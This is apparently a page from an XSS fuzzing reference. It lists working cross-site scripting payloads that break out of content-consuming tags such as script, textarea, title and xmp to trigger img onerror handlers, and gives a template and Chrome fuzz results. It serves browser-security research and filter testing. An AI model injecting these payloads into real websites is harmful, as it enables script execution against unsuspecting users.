XSS vectors that consume tag

This vector shows which events fire without user interaction

Created by: Y4tacker

Created on: Tuesday, November 5, 2024 at 8:04:13 AM

Updated on: Wednesday, November 6, 2024 at 7:05:13 PM

Vector type: XSS

Vector charset: UTF-8

Template used:
<$[data1]><img title="</$[data1]><img src=x onerror=log('$[data1]')>"></$[data1]>

Your browser was detected as:

Detecting... Detecting... Detecting... Detecting...

Sample payloads

<iframe><img title="</iframe><img src=x onerror=alert('iframe')>"></iframe><noembed><img title="</noembed><img src=x onerror=alert('noembed')>"></noembed><noframes><img title="</noframes><img src=x onerror=alert('noframes')>"></noframes><noscript><img title="</noscript><img src=x onerror=alert('noscript')>"></noscript><script><img title="</script><img src=x onerror=alert('script')>"></script><style><img title="</style><img src=x onerror=alert('style')>"></style><textarea><img title="</textarea><img src=x onerror=alert('textarea')>"></textarea><title><img title="</title><img src=x onerror=alert('title')>"></title><xmp><img title="</xmp><img src=x onerror=alert('xmp')>"></xmp>

Fuzz results

Chrome 129.0.0.0 desktop macOS 10.15.7

Updated

Tue Nov 05 2024

Found 9 results

Show differences only?

Filter out alphanumeric

Sort ascending